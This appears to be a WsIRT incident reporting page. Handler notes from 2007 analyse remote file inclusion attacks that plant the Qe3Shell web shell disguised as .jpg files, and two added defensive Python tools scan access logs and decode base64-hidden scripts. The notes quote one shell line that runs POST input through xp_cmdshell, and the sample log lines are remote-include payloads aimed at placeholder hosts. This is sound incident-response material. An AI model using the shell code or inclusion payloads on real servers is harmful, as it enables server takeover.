Webserver Incident Reporting and Termination(TM) Squad
NOTE: Web servers have logs, and in those logs is evidence of attempted hacking. For instance, one may notice an attack that tries to include a script such as "r57.php??" from a remote server. It's these kinds of attacks we're looking to investigate. For a concrete example, see these reports.
Please do not submit phish, spam, or malware to WsIRT. Only submit attack signatures from web server logs. As this project hasn't officially been publicly launched, we are still reclassifying the tool and its verbiage.
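The kind of log evidence the note describes is a request whose query string carries a URL to a script on another host (the classic remote file inclusion attempt, with "r57.php?" as the page's example). The following scanner is an added example, not a WsIRT tool, that pulls such requests out of Apache combined-format access logs so they can be reported; all log lines, IP addresses and hostnames in it are constructed placeholders, and the list of script suffixes is an assumption.

```python
"""Added example (not part of the WsIRT page): flag remote-file-inclusion
attempts in Apache/nginx combined-format access logs.  The signature is a
query-string parameter whose value is a URL pointing at a script on a host
other than our own, e.g.  /index.php?page=http://203.0.113.9/r57.php?
Every log line below is constructed for this example."""

import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Suffixes seen on included scripts (assumption; r57.php comes from the page,
# and the page's 1.jpg/2.jpg/3.jpg show that image names are used for shells too).
RFI_SUFFIXES = ('.php', '.txt', '.jpg', '.gif', '.inc')


def is_remote_include(value, local_hosts):
    """True when a parameter value is an absolute URL to a script on a foreign host."""
    v = unquote(value).strip()
    if not re.match(r'^(https?|ftp)://', v, re.I):
        return False
    parts = urlsplit(v)
    host = parts.hostname  # already lowercased by urlsplit
    if host is None or host in local_hosts:
        return False
    # A trailing "?" (r57.php?) makes the victim's include path become a query string;
    # treat it as a signature on its own.
    return parts.path.lower().endswith(RFI_SUFFIXES) or v.endswith('?')


def scan_log(lines, local_hosts=frozenset()):
    """Return one finding per (request, parameter) pair that looks like an RFI attempt."""
    local = {h.lower() for h in local_hosts}
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group('target')).query
        # parse_qsl percent-decodes values, so encoded "http%3A%2F%2F..." is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if is_remote_include(value, local):
                findings.append({
                    'ip': m.group('ip'),
                    'time': m.group('time'),
                    'param': name,
                    'url': unquote(value),
                    'status': int(m.group('status')),
                })
    return findings


def by_source(findings):
    """Group the included URLs by requesting IP, the shape an abuse report needs."""
    report = {}
    for f in findings:
        report.setdefault(f['ip'], set()).add(f['url'])
    return report


# Constructed sample log (documentation-range addresses; no real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2007:19:05:02 +0000] "GET /index.php?page=http://198.51.100.9/r57.php? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [01/Dec/2007:19:05:03 +0000] "GET /gallery.php?img=http%3A%2F%2F198.51.100.9%2F1.jpg HTTP/1.1" 404 210 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [01/Dec/2007:19:06:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "http://www.example.com/" "Mozilla/5.0"',
    '198.51.100.21 - - [01/Dec/2007:19:06:30 +0000] "GET /redirect.php?url=http://www.example.com/news.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, urls in by_source(scan_log(SAMPLE_LOG, {'www.example.com'})).items():
        print(ip, sorted(urls))
```

Pass your own hostnames as `local_hosts`; without them, legitimate redirects to your own site (the fourth sample line) are reported as well. A 404 on the include (second line) is still worth reporting: the attempt tells you which parameter the attacker is probing, whether or not it worked.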
Paul: Extended information for AS30340:
State/Province: wa
Country: us
Responsible Domain: llix.net
Abuse Email: postmaster@llix.net
Handler Note: 01 Dec, 2007 19:05:02
Paul: The 1.jpg file for download upon inspection reveals a <title>#ulil security tester on dalnet Qe3</title> name.
Handler Note: 01 Dec, 2007 19:09:24
Paul: The Qe3Shell not only permits access to the exploited web server, but it also establishes SQL database connections. It is claimed by * Ulil Hacker Security Tester* * http://ulga.by.ru in the source.
Handler Note: 01 Dec, 2007 19:12:34
Paul: One of the commands the Qe3shell executes is:
("insert into Qe3_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db)
Paul: We have found attackers attempting to inject the 3.jpg script into exploitable web servers. While investigating we found files 2.jpg and 1.jpg, which are also nefarious in nature. All scripts, if successfully injected into a remote web server, permit criminals to gather intelligence on those systems, and even take control via the Qe3shell. Please remove these immediately.
Handler Note: 01 Dec, 2007 19:17:38
Paul: Generated and sent email attack alert to respective parties.
Handler Note: 02 Dec, 2007 00:23:32
Paul: There are a handful of base64 encoded variables, which when decoded contain perl scripts that make Internet connections, to say the least.
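The last note describes a common triage step on a recovered shell: base64 blobs in the source hide the real payload, and decoding them shows what it is. The helper below is an added example (not the handler's tool) that finds base64-looking strings in a file, decodes the ones that validate, and reports those that decode to a script. The marker list is an assumption, and the sample "shell" is constructed at runtime from a harmless Perl stub that only imports IO::Socket and prints a line.

```python
"""Added example (not part of the WsIRT page): locate base64-encoded scripts
inside a recovered web shell's source.  The markers and the constructed sample
below are assumptions made for this example."""

import base64
import binascii
import re

# Runs of base64 alphabet long enough to hold a script; padding is optional.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')

# Strings that identify a decoded blob as a script (assumed list).
SCRIPT_MARKERS = (b'#!/usr/bin/perl', b'use IO::Socket', b'use Socket',
                  b'<?php', b'#!/bin/sh', b'#!/bin/bash')


def find_encoded_scripts(source):
    """Return one hit per base64 blob that decodes to something containing a script marker."""
    hits = []
    for m in B64_RE.finditer(source):
        blob = m.group(0)
        try:
            # validate=True rejects stray characters; a wrong length raises as well
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        markers = [mk.decode() for mk in SCRIPT_MARKERS if mk in decoded]
        if markers:
            hits.append({
                'offset': m.start(),
                'encoded_len': len(blob),
                'markers': markers,
                'preview': decoded[:60].decode('latin-1'),
            })
    return hits


# Constructed sample: a harmless Perl stub (imports a socket module, never connects)
# embedded as a base64 variable in a PHP-like shell source, next to decoy strings.
SAMPLE_PERL = (b'#!/usr/bin/perl\n'
               b'use IO::Socket;\n'
               b'print "constructed sample, no connection made\\n";\n')
SAMPLE_SOURCE = (
    '<?php\n'
    '$logo = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==";\n'
    '$back = "' + base64.b64encode(SAMPLE_PERL).decode() + '";\n'
    '$test4_file = $_POST["test4_file"];\n'
)

if __name__ == '__main__':
    for hit in find_encoded_scripts(SAMPLE_SOURCE):
        print(hit['offset'], hit['markers'], repr(hit['preview']))
```

The first variable in the sample is a tiny PNG, which decodes cleanly but carries no script marker, so only the Perl blob is reported. On a real shell the same decoding step would be repeated on anything the decoded script itself embeds, since these payloads are often nested.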